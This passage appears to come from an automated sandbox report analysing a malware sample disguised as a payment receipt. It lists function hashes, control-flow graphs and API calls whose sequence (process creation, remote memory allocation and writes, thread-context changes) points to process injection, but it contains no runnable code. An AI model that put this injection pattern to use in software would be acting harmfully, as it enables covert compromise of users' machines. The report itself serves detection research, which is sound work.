                                                    • API String ID:
                                                    • Opcode ID: 360c42341ff62cf4a11a481ab1a7a15c6d10aa4e68956d9c12d89be50be2a809
                                                    • Instruction ID: 3b6908b6b760e4ee699cbf445909b91ac6cf6d0fed75e81426a63e4e32e96b00
                                                    • Opcode Fuzzy Hash: 360c42341ff62cf4a11a481ab1a7a15c6d10aa4e68956d9c12d89be50be2a809
                                                    • Instruction Fuzzy Hash: C9312870E016588BDB58CFABD8446DEBBB7AFC9300F14C06AE509AA264DB355A45CF90
                                                    Function 06F4D7D4 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbc5b00269eba171f01818cc6f9c19c54b941466d7ca627ba527aa896b49f2b0
                                                    • Instruction ID: c59d886396c248239cbe6b161dfbbda84801d2d93acf071025aa1edaad37f9b1
                                                    • Opcode Fuzzy Hash: cbc5b00269eba171f01818cc6f9c19c54b941466d7ca627ba527aa896b49f2b0
                                                    • Instruction Fuzzy Hash: 69C04C279CE004D99790398864004F8AA2DB6CB061F003162952D669124510832546C4
                                                    Function 05A5AD88 Relevance: 6.6, Strings: 5, Instructions: 320COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 295 5a5ad88-5a5ad9f 297 5a5ada1-5a5adb0 295->297 298 5a5ae02-5a5ae10 295->298 297->298 301 5a5adb2-5a5adbe call 5a59e38 297->301 302 5a5ae23-5a5ae25 298->302 303 5a5ae12-5a5ae1d call 5a59d8c 298->303 309 5a5adc0-5a5adcc call 5a59e48 301->309 310 5a5add2-5a5adee 301->310 397 5a5ae27 call 5a5ad61 302->397 398 5a5ae27 call 5a5ad88 302->398 303->302 311 5a5aee2-5a5af5a 303->311 308 5a5ae2d-5a5ae3c 317 5a5ae54-5a5ae57 308->317 318 5a5ae3e-5a5ae4f call 5a59e58 308->318 309->310 319 5a5ae58-5a5ae96 309->319 323 5a5adf4-5a5adf8 310->323 324 5a5ae9d-5a5aedb 310->324 338 5a5af63-5a5af6d 311->338 339 5a5af5c-5a5af62 311->339 318->317 319->324 323->298 324->311 343 5a5af73-5a5af8c call 5a59e7c * 2 338->343 344 5a5b1a9-5a5b1d5 338->344 351 5a5af92-5a5afb4 343->351 352 5a5b1dc-5a5b22d 343->352 344->352 359 5a5afc5-5a5afd4 351->359 360 5a5afb6-5a5afc4 call 5a59e58 351->360 365 5a5afd6-5a5aff3 359->365 366 5a5aff9-5a5b01a 359->366 365->366 373 5a5b01c-5a5b02d 366->373 374 5a5b06a-5a5b092 366->374 377 5a5b05c-5a5b060 373->377 378 5a5b02f-5a5b047 call 5a59e8c 373->378 399 5a5b095 call 5a5b460 374->399 400 5a5b095 call 5a5b470 374->400 377->374 385 5a5b04c-5a5b05a 378->385 386 5a5b049-5a5b04a 378->386 381 5a5b098-5a5b0bd 389 5a5b103 381->389 390 5a5b0bf-5a5b0d4 381->390 385->377 385->378 386->385 389->344 390->389 392 5a5b0d6-5a5b0f9 390->392 392->389 396 5a5b0fb 392->396 396->389 397->308 398->308 399->381 400->381
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq$Haq$Haq$Haq$Haq
                                                    • API String ID: 0-1792267638
                                                    • Opcode ID: d88a51dda35217ad9500a9b3a6adbff9d784a4b133bc4459d7b2ca205a2bc20a
                                                    • Instruction ID: 64293636ab060b17414e02d4450454a9a2796daa2ffa1188a53ef4513d25264e
                                                    • Opcode Fuzzy Hash: d88a51dda35217ad9500a9b3a6adbff9d784a4b133bc4459d7b2ca205a2bc20a
                                                    • Instruction Fuzzy Hash: 5AB14B35B002188FDB14EB78D554DAEB7F6FF89311B2444A9D816AB3A4DE35EC02CB61
                                                    Function 06F4A7EC Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 906 6f4a7ec-6f4a88d 909 6f4a8c6-6f4a8e6 906->909 910 6f4a88f-6f4a899 906->910 915 6f4a91f-6f4a94e 909->915 916 6f4a8e8-6f4a8f2 909->916 910->909 911 6f4a89b-6f4a89d 910->911 912 6f4a8c0-6f4a8c3 911->912 913 6f4a89f-6f4a8a9 911->913 912->909 917 6f4a8ad-6f4a8bc 913->917 918 6f4a8ab 913->918 926 6f4a987-6f4aa41 CreateProcessA 915->926 927 6f4a950-6f4a95a 915->927 916->915 919 6f4a8f4-6f4a8f6 916->919 917->917 920 6f4a8be 917->920 918->917 921 6f4a8f8-6f4a902 919->921 922 6f4a919-6f4a91c 919->922 920->912 924 6f4a904 921->924 925 6f4a906-6f4a915 921->925 922->915 924->925 925->925 928 6f4a917 925->928 938 6f4aa43-6f4aa49 926->938 939 6f4aa4a-6f4aad0 926->939 927->926 929 6f4a95c-6f4a95e 927->929 928->922 931 6f4a960-6f4a96a 929->931 932 6f4a981-6f4a984 929->932 933 6f4a96c 931->933 934 6f4a96e-6f4a97d 931->934 932->926 933->934 934->934 936 6f4a97f 934->936 936->932 938->939 949 6f4aae0-6f4aae4 939->949 950 6f4aad2-6f4aad6 939->950 952 6f4aaf4-6f4aaf8 949->952 953 6f4aae6-6f4aaea 949->953 950->949 951 6f4aad8 950->951 951->949 955 6f4ab08-6f4ab0c 952->955 956 6f4aafa-6f4aafe 952->956 953->952 954 6f4aaec 953->954 954->952 958 6f4ab1e-6f4ab25 955->958 959 6f4ab0e-6f4ab14 955->959 956->955 957 6f4ab00 956->957 957->955 960 6f4ab27-6f4ab36 958->960 961 6f4ab3c 958->961 959->958 960->961 963 6f4ab3d 961->963 963->963
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F4AA2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: d1613c2fc4f66b6ecc7f30fc78abef3d732adf3572d0fb0acd79f8f4f56ddd1f
                                                    • Instruction ID: fdf68a8c9c624eaf792a1cd3028e0a86a9740d91c5d5625f0e4676d92ff68c0e
                                                    • Opcode Fuzzy Hash: d1613c2fc4f66b6ecc7f30fc78abef3d732adf3572d0fb0acd79f8f4f56ddd1f
                                                    • Instruction Fuzzy Hash: DDA17C71D40219CFEB64DF68C840BEEBBB2FF48304F1485A9D809A7284DB759985CF91
                                                    Function 06F4A7F8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 964 6f4a7f8-6f4a88d 966 6f4a8c6-6f4a8e6 964->966 967 6f4a88f-6f4a899 964->967 972 6f4a91f-6f4a94e 966->972 973 6f4a8e8-6f4a8f2 966->973 967->966 968 6f4a89b-6f4a89d 967->968 969 6f4a8c0-6f4a8c3 968->969 970 6f4a89f-6f4a8a9 968->970 969->966 974 6f4a8ad-6f4a8bc 970->974 975 6f4a8ab 970->975 983 6f4a987-6f4aa41 CreateProcessA 972->983 984 6f4a950-6f4a95a 972->984 973->972 976 6f4a8f4-6f4a8f6 973->976 974->974 977 6f4a8be 974->977 975->974 978 6f4a8f8-6f4a902 976->978 979 6f4a919-6f4a91c 976->979 977->969 981 6f4a904 978->981 982 6f4a906-6f4a915 978->982 979->972 981->982 982->982 985 6f4a917 982->985 995 6f4aa43-6f4aa49 983->995 996 6f4aa4a-6f4aad0 983->996 984->983 986 6f4a95c-6f4a95e 984->986 985->979 988 6f4a960-6f4a96a 986->988 989 6f4a981-6f4a984 986->989 990 6f4a96c 988->990 991 6f4a96e-6f4a97d 988->991 989->983 990->991 991->991 993 6f4a97f 991->993 993->989 995->996 1006 6f4aae0-6f4aae4 996->1006 1007 6f4aad2-6f4aad6 996->1007 1009 6f4aaf4-6f4aaf8 1006->1009 1010 6f4aae6-6f4aaea 1006->1010 1007->1006 1008 6f4aad8 1007->1008 1008->1006 1012 6f4ab08-6f4ab0c 1009->1012 1013 6f4aafa-6f4aafe 1009->1013 1010->1009 1011 6f4aaec 1010->1011 1011->1009 1015 6f4ab1e-6f4ab25 1012->1015 1016 6f4ab0e-6f4ab14 1012->1016 1013->1012 1014 6f4ab00 1013->1014 1014->1012 1017 6f4ab27-6f4ab36 1015->1017 1018 6f4ab3c 1015->1018 1016->1015 1017->1018 1020 6f4ab3d 1018->1020 1020->1020
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F4AA2E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 3d33749a02913d0b884f91f0223a683dba10f13e6c7b3952e14c790687f0e5e2
                                                    • Instruction ID: bcbbff3ac89bc4153513e4e269b72c8ff8f878787afb02a7c35f173f07b246f8
                                                    • Opcode Fuzzy Hash: 3d33749a02913d0b884f91f0223a683dba10f13e6c7b3952e14c790687f0e5e2
                                                    • Instruction Fuzzy Hash: CC917B71D00219CFEB64DF68C840BEDBBB2FF48304F1485AAD809A7288DB759985CF91
                                                    Function 023EB2E0 Relevance: 1.7, APIs: 1, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 023EB546
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: a6dcddb701532f3e7b30c7f1c39451ea94969fd611d90e31be651be1c33496fb
                                                    • Instruction ID: fac507a4a9272b6f9d444d4e7735800416d8af8d515ccdf6909e3cbf3f66e7fe
                                                    • Opcode Fuzzy Hash: a6dcddb701532f3e7b30c7f1c39451ea94969fd611d90e31be651be1c33496fb
                                                    • Instruction Fuzzy Hash: DB814370A00B558FDB25DF69D04175ABBF2FF88308F00892AD48AD7A90D774E809CF91
                                                    Function 05811DE4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05811F02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: a3d02d45da8228995317207eda61c7c1650fa905086bcbf738357ceccd0da1da
                                                    • Instruction ID: af4d7659fca890a9690c0a2bdbb8a2ec7c4a2341a33d32007584415d36061e07
                                                    • Opcode Fuzzy Hash: a3d02d45da8228995317207eda61c7c1650fa905086bcbf738357ceccd0da1da
                                                    • Instruction Fuzzy Hash: 5351BEB1D003499FDB14CFA9C884ADEFBB6BF48314F24812AE919AB250D774A845CF94
                                                    Function 05810B80 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05811F02
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: d7b1ba1195d437c954003926cf493568b25903ad9089844a11c531c0543a33d2
                                                    • Instruction ID: e8afb471217f48cae052a79f8c80ac424476a11d499fac9135fdecbb69f46368
                                                    • Opcode Fuzzy Hash: d7b1ba1195d437c954003926cf493568b25903ad9089844a11c531c0543a33d2
                                                    • Instruction Fuzzy Hash: E751BEB1D003499FDB14CF99C888ADEBBB6FF48314F24812AE919AB250D774A845CF94
                                                    Function 023E590D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 023E59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: d4efe2fc0a8cc65e5ebbcb83a96a25b774e4c06d394ca516999cf839f886abb7
                                                    • Instruction ID: 02ca4c62d1fdf7255e8d17410c0edf9735b2db8b74bf52173dfaff677bf443a9
                                                    • Opcode Fuzzy Hash: d4efe2fc0a8cc65e5ebbcb83a96a25b774e4c06d394ca516999cf839f886abb7
                                                    • Instruction Fuzzy Hash: 4341E5B0C00619CBDB24CFA9C884BCDBBF5BF45308F20815AD409AB295DB75694ACF90
                                                    Function 06EF0006 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06EF00D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: dadfa96f4dda81d92f4e57527ef04f8694db5451f400a45413f579000eab4ee0
                                                    • Instruction ID: c24fabd0c01884d07c89688228ea2c1e41eea1093af321916ab2f2e8f3ef0b39
                                                    • Opcode Fuzzy Hash: dadfa96f4dda81d92f4e57527ef04f8694db5451f400a45413f579000eab4ee0
                                                    • Instruction Fuzzy Hash: AE3168B1D053499FEB01CFAAC840AEEBFF5EF4A320F14846AE814E7251D7759944CBA1
                                                    Function 05810CD4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05814471
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 72331ce0f64b1976edb1d39dfabb3c1606035a66c9b7a9f84faf32caa2fd1e85
                                                    • Instruction ID: 9627aa0f0466e8e1b64d893e6d0c714311dcb37670a64bf9d187cebb0717696f
                                                    • Opcode Fuzzy Hash: 72331ce0f64b1976edb1d39dfabb3c1606035a66c9b7a9f84faf32caa2fd1e85
                                                    • Instruction Fuzzy Hash: 274118B5900209DFDB14CF99C488AAAFBF9FF88314F24C459D919AB321D374A845CFA4
                                                    Function 023E44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 023E59C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 172184591530c69ecbc1701bb5f4555dfc197982f3e0d032032523a813c045b6
                                                    • Instruction ID: 8d484861eb82b22e6ba4896f54df86e82199628eb24c5bae5eb438325bafefcd
                                                    • Opcode Fuzzy Hash: 172184591530c69ecbc1701bb5f4555dfc197982f3e0d032032523a813c045b6
                                                    • Instruction Fuzzy Hash: DF41D2B0C0061DCBDB24DFA9C884BDDBBF5BF49308F60816AD409AB295DB756949CF90
                                                    Function 06F4A568 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F4A600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 63728c97aafb2fd0d5741e9d7f8fd4fc41e9bb9fa1e00ed4541169e1d8258fbf
                                                    • Instruction ID: 678e0fa696c9fae94f0425aa81d07868ff64c7d40510e9ca45405100576e59be
                                                    • Opcode Fuzzy Hash: 63728c97aafb2fd0d5741e9d7f8fd4fc41e9bb9fa1e00ed4541169e1d8258fbf
                                                    • Instruction Fuzzy Hash: 342148B5D002499FDB10DFA9C885BEEBFF1FF48314F10842AE959A7240C7789940CBA0
                                                    Function 06F4A570 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F4A600
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 17c54a23676256548b028d73e3d6183de21f85a323924b8d2aed2394937e78ec
                                                    • Instruction ID: f69c370bf69c8d1e3fe78cc4ebad9b862b48f4acb7f83d2309a6e914745b4750
                                                    • Opcode Fuzzy Hash: 17c54a23676256548b028d73e3d6183de21f85a323924b8d2aed2394937e78ec
                                                    • Instruction Fuzzy Hash: 8D21F3B5D002499FDB10DFAAC885BEEBBF5FF48314F10842AE919A7244C7789954CBA4
                                                    Function 06EF0040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06EF00D7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DrawText
                                                    • String ID:
                                                    • API String ID: 2175133113-0
                                                    • Opcode ID: fdb4d41802a294301c77713b217be8646b180b5cc528f23548600052c3badcd2
                                                    • Instruction ID: 1a191a4fcbc7983cf73ab1a55953296c59757e59ec946904858da27589582ef1
                                                    • Opcode Fuzzy Hash: fdb4d41802a294301c77713b217be8646b180b5cc528f23548600052c3badcd2
                                                    • Instruction Fuzzy Hash: 5C21CEB5D013499FDB10CF9AD884AAEFBF5FB48324F14842AE919A7210D775A944CFA0
                                                    Function 06F4A659 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F4A6E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: b63afb0bd15151222fd5d1783a1b73f30bbd95d5c2b30be1d01112c2a666f15f
                                                    • Instruction ID: e4d9116eab586b3992c0591c5e22b41c718c3b80f8a3fa796c14a2b3a39f977e
                                                    • Opcode Fuzzy Hash: b63afb0bd15151222fd5d1783a1b73f30bbd95d5c2b30be1d01112c2a666f15f
                                                    • Instruction Fuzzy Hash: 06214AB1C002499FDB10DFAAC885AEEFFF5FF48310F108429E959A7240CB389945CBA0
                                                    Function 06F49F99 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F4A01E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 88d3067f1fe0d725ba43c3e1e08ae61453a4b1ea0ae520d03f84572d209d453a
                                                    • Instruction ID: c35fef6da9bd66cae6f5e1ff68dc94e492c144130d45211f91106dcc04192227
                                                    • Opcode Fuzzy Hash: 88d3067f1fe0d725ba43c3e1e08ae61453a4b1ea0ae520d03f84572d209d453a
                                                    • Instruction Fuzzy Hash: 042145B1D002488FDB14DFAAC885BEEBFF4EF49324F14842AD459A7240CB789945CFA0
                                                    Function 023ED070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023ED76E,?,?,?,?,?), ref: 023ED82F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: faaf343bbd5be80a882e5d70b3e2f54808e4d69de577a85ed5765d6355fe68d4
                                                    • Instruction ID: 87012afb8d2e2d05b657098ede2ec63221cc5a20c0bc73435b565e8de77b8a0a
                                                    • Opcode Fuzzy Hash: faaf343bbd5be80a882e5d70b3e2f54808e4d69de577a85ed5765d6355fe68d4
                                                    • Instruction Fuzzy Hash: FE2103B5900208AFDB10CF9AD584AEEBFF8FB48310F10805AE918A7350D378A944CFA0
                                                    Function 023ED7A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,023ED76E,?,?,?,?,?), ref: 023ED82F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: c3ddd593e5a6d96448b78f78dae56fc3d2a8118280dc4be140d3abfca461edd6
                                                    • Instruction ID: 7e4c8f0c6113340aa693b766ebd93f2431dfadb88f3b5050a5e1a46e38664e52
                                                    • Opcode Fuzzy Hash: c3ddd593e5a6d96448b78f78dae56fc3d2a8118280dc4be140d3abfca461edd6
                                                    • Instruction Fuzzy Hash: E921E0B59002589FDB10CFA9D984AEEBBF8FB48310F14845AE918A3250C378A945CFA0
                                                    Function 06F4A660 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F4A6E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: ec1fa29c06189752392473fd89872f98e85f2e2178dfd82f7e89e398c321e809
                                                    • Instruction ID: d48c742cb2de5909cd209301a566620ec44f81cb142a0fc61ec69309eac99c30
                                                    • Opcode Fuzzy Hash: ec1fa29c06189752392473fd89872f98e85f2e2178dfd82f7e89e398c321e809
                                                    • Instruction Fuzzy Hash: C52107B1C003499FDB10DFAAC885AEEFBF5FF48310F50842AE519A7250DB789944DBA5
                                                    Function 06F49FA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F4A01E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: c9f72921405eda8f2de8ce0a4ccca7d6613744eff069c98e95c3fddf301f8a8d
                                                    • Instruction ID: 090e67b48a81121a4b1e3bb446f0a6afef19b993b46f2b66c634dd8fec3c5f23
                                                    • Opcode Fuzzy Hash: c9f72921405eda8f2de8ce0a4ccca7d6613744eff069c98e95c3fddf301f8a8d
                                                    • Instruction Fuzzy Hash: B62104B1D003098FDB14DFAAC485BAEBFF4EF48324F14842AD559A7244DB78A945CBA1
                                                    Function 06EFDA0B Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EFDA83
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 9df1cde973b88fc5575281ca81b8b9b786f9c326e257718ddc043138ec3a1831
                                                    • Instruction ID: 71bda20ea1c8dc48c3cf6b0a2b05f0da7a32fbe3a13d1928ba0c0ffc071f23ec
                                                    • Opcode Fuzzy Hash: 9df1cde973b88fc5575281ca81b8b9b786f9c326e257718ddc043138ec3a1831
                                                    • Instruction Fuzzy Hash: C421F4B59002499FDB10DFAAD884ADEFFF8EF48310F108429E958A7251D378A644CFA5
                                                    Function 06F4A4A8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F4A51E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
